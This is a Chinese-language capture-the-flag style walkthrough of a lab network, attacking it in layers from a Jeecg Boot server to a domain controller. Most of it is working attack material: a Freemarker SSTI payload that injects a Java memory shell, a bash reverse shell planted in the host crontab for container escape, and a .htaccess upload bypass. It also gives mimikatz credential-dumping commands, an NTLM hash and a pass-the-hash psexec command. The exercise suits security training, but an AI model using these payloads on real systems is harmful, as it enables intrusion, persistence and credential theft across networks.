Java内存马注入与多层内网渗透实战教学<\/h1>

1. 靶场环境概述<\/h2>

1.1 靶场拓扑<\/h3>
目标IP: 10.10.0.3<\/li>
开放服务:
22(SSH)<\/li>
18088(Web服务)<\/li>
6379(Redis)<\/li>
3306(MySQL)<\/li>
18080(Web服务)<\/li> <\/ul> <\/li> <\/ul>
1.2 考察技术点<\/h3>
主机信息收集<\/li>
Java代码审计<\/li>
Java内存马注入<\/li>
不出网环境下的权限获取<\/li>
容器化信息收集与逃逸<\/li>
蜜罐对抗<\/li>
Webshell杀软对抗<\/li>
多级代理域渗透<\/li> <\/ol>
2. 初始信息收集<\/h2>

2.1 端口扫描<\/h3>
使用fscan工具进行扫描:<\/p>
fscan-gw.exe -h 10.10.0.3
<\/code><\/pre>
发现关键服务:<\/p>

Redis未授权访问<\/li>
MySQL弱口令(root\/root)<\/li>
两个Web服务(18080和18088)<\/li>
<\/ul>
2.2 Web服务探测<\/h3>


18088端口:<\/p>

存在\/jeecg-boot\/路径<\/li>
使用Jeecg Boot框架<\/li>
<\/ul>
<\/li>

18080端口:<\/p>

显示DocToolkit<\/li>
<\/ul>
<\/li>
<\/ol>
3. 漏洞利用<\/h2>
3.1 Jeecg Boot SSTI注入漏洞(CVE-2023-4450)<\/h3>
3.1.1 漏洞验证<\/h4>
POST请求:<\/p>
POST \/jeecg-boot\/jmreport\/queryFieldBySql HTTP\/1.1
Host: 10.10.0.3:18088
Content-Type: application\/json

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"whoami\") }'"}
<\/code><\/pre>
3.1.2 内存马注入<\/h4>
使用pen4uin\/java-memshell-generator生成内存马payload:<\/p>

生成AntSword Tomcat Listener类型内存马<\/li>
配置参数:

密码: Cslbewkahmg<\/li>
请求路径: \/*<\/li>
请求头: Referer: Hftaa<\/li>
脚本类型: JSP<\/li>
<\/ul>
<\/li>
<\/ol>
将生成的base64格式内存马替换到payload中:<\/p>
{
<\/span><\/span>  "sql"<\/span>:"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='[BASE64内存马]';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1}dbSource"<\/span>:""<\/span>,"type"<\/span>:"0"<\/span>}
<\/span><\/span><\/code><\/pre>4. 权限提升与持久化<\/h2>
4.1 获取Shiro key<\/h3>
在\/home\/ubuntu\/.work\/<\/code>目录下找到源码，反编译发现Shiro key:<\/p>
QZIysgMYhG7\/CzIJlVpR1g==
<\/code><\/pre>
4.2 蚁剑连接<\/h3>

连接URL: http:\/\/10.10.0.3:18080\/favicondemo.ico<\/li>
密码: pass1024<\/li>
<\/ul>
5. 容器逃逸<\/h2>
5.1 环境确认<\/h3>
使用df -h<\/code>命令发现容器挂载了宿主机目录:<\/p>
\/dev\/tmp 挂载到宿主机
<\/code><\/pre>
5.2 定时任务逃逸<\/h3>

创建反弹shell脚本:<\/li>
<\/ol>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>bash -i >& \/dev\/tcp\/IP\/6665 0>&1<\/span>
<\/span><\/span><\/code><\/pre>
写入定时任务:<\/li>
<\/ol>
sed -i '$a*\/1 * * * * root bash \/tmp\/test.sh'<\/span> \/dev\/tmp\/etc\/crontab
<\/span><\/span><\/code><\/pre>6. 内网横向移动<\/h2>
6.1 第一层内网(192.168.80.0\/24)<\/h3>
发现主机:<\/p>

192.168.80.55(Windows Server 2008 R2)<\/li>
<\/ul>
文件上传绕过<\/h4>

上传.htaccess文件:<\/li>
<\/ol>
<FilesMatch<\/span> "\.jpg"<\/span>><\/span>
<\/span><\/span>  SetHandler application\/x-httpd-php
<\/span><\/span><\/FilesMatch><\/span>
<\/span><\/span><\/code><\/pre>
上传免杀Webshell(使用ruoji工具生成)<\/li>
<\/ol>
6.2 第二层内网(192.168.81.0\/24)<\/h3>
发现主机:<\/p>

192.168.81.20(Weblogic)<\/li>
<\/ul>
代理设置<\/h4>
使用Stowaway建立多层代理:<\/p>

VPS监听:<\/li>
<\/ol>
.\/linux_x64_admin -l 9001 -s 123
<\/code><\/pre>

目标机连接:<\/li>
<\/ol>
.\/linux_x64_agent -c IP:9001 -s 123 --reconnect 8
<\/code><\/pre>
6.3 第三层内网(192.168.77.0\/24)<\/h3>
发现域控:<\/p>

192.168.77.250(WIN-LAVRSND6J6N.c3ting.org)<\/li>
<\/ul>
凭证获取<\/h4>
使用mimikatz获取hash:<\/p>
privilege::debug
token::elevate
sekurlsa::logonpasswords
<\/code><\/pre>
获取到Administrator的NTLM hash:<\/p>
7ab183888ecafcccf897c4a5a59c8568
<\/code><\/pre>
PTH攻击<\/h4>
使用psexec进行哈希传递:<\/p>
proxychains4 python3 psexec.py -hashes :7ab183888ecafcccf897c4a5a59c8568 c3ting.org\/administrator@192.168.77.250
<\/code><\/pre>
7. 关键工具与技术总结<\/h2>
7.1 工具列表<\/h3>

扫描工具: fscan<\/li>
内存马生成: pen4uin\/java-memshell-generator<\/li>
代理工具: Stowaway<\/li>
Webshell管理: 蚁剑、冰蝎、哥斯拉<\/li>
免杀工具: ruoji<\/li>
凭证获取: mimikatz<\/li>
<\/ol>
7.2 技术要点<\/h3>


Java内存马注入的多种方式:<\/p>

通过SSTI漏洞加载<\/li>
使用defineClass动态加载<\/li>
多种base64解码方式兼容<\/li>
<\/ul>
<\/li>

容器逃逸方法:<\/p>

挂载目录逃逸<\/li>
定时任务持久化<\/li>
<\/ul>
<\/li>

内网渗透技巧:<\/p>

多层代理建立<\/li>
杀软规避(上传到ProgramData目录)<\/li>
域环境下的哈希传递<\/li>
<\/ul>
<\/li>

Webshell免杀:<\/p>

.htaccess文件伪装<\/li>
代码混淆加密<\/li>
动态函数调用<\/li>
<\/ul>
<\/li>
<\/ol>
8. 防御建议<\/h2>

及时更新Jeecg Boot等框架<\/li>
限制Freemarker模板执行权限<\/li>
监控异常Java进程和内存加载<\/li>
容器配置适当的安全策略<\/li>
内网分段隔离<\/li>
启用强密码策略和双因素认证<\/li>
定期审计域内账户和权限<\/li>
<\/ol>